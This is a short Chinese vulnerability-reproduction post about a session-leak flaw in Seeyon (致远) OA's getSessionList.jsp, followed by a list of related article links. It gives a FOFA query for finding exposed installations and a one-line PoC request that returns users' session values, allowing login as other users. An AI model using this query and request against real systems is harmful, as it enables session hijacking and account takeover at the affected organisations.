致远OA getSessionList.jsp Session泄漏漏洞

漏洞简介

通过使用存在漏洞的请求时，会回显部分用户的Session值，导致出现任意登录的情况

漏洞复现

fofa语法：app="致远互联-OA"
登录页面如下：

POC：

/yyoa/ext/https/getSessionList.jsp?cmd=getAll

回显session则存在漏洞

本栏目推荐文章
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 短视频商城系统，session和cookie实现登录
• 加了@SessionAttributes("uid")退出登陆后如何清除session
• jsp有哪些内置对象
• HTTP安全头部对jsp页面不生效
• 漏洞扫描以识别可能使企业面临网络威胁的安全漏洞
• 渗透测试，找出各种潜在的漏洞
• 面试官：禁用Cookie后Session还能用吗？
• 【五期李伟平】CCF-A（MobiCom'18 Session EdgeTech'18）A Game-Theoretic Approach to Multi-Objective Resource Sharing and Allocation in Mobile Edge Clouds
• CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞